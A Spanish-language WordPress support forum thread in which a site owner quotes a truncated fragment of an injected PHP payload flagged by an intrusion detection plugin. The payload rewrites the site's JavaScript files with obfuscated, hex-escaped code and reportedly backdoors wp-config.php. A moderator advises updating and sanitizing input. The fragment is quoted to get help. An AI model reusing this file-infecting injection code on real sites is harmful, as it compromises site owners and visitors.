Ataque a mi WordPress | WordPress.org España

jmtucu
(@jmtucu)

hace 14 años, 2 meses

Hola! No se si este tema va a acá, creería que si, pero les comento.
Mi sitio está siendo atacado desde varios IPs, tengo instalado Mute Screamer (es un IDS), Scanner Exploit, IP Ban y me muestra esto:

POST.HOST: set_time_limit(0); function modify($fname){ $tmp = file_get_contents($fname); $pos = strpos($tmp,'var _0xa687=["\x74\x6F\x4C'); if ($pos === false){ $code = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F"... y sigue.

Lo que hacen es ejecutarme eso, no se cómo, y me infectan todos los JS. El virus también me modifica el wp-config.php abriendo una puerta de acceso. Yo hice un script para limpiarlo pero sería conveniente eliminar el problema de raíz.

Alguien tuvo un problema similar?
Gracias de antemano.

Viendo 1 respuesta (de un total de 1)

Moderador erchache2000
(@erchache2000)

hace 14 años, 2 meses

Pues sí, tiene toda la pinta de que están intentando inyectar código.

Actualiza el software de tu wordpress y sanitiza todo el código php/html que hayas metido a mano.

Es decir filtrar los post para que no puedan inyectar código del estilo «\x73\x63\x5F\x63\x6F

Viendo 1 respuesta (de un total de 1)

El debate ‘Ataque a mi WordPress’ está cerrado a nuevas respuestas.

Etiquetas

En: Guías – Resolución de problemas
1 respuesta
2 participantes
Última respuesta de: erchache2000
Última actividad: hace 14 años, 2 meses
Estado: sin resolver

Debates

Debates populares

Debates sin respuestas

Debates que no son soporte

Debates resueltos

Debates no resueltos

Todos los debates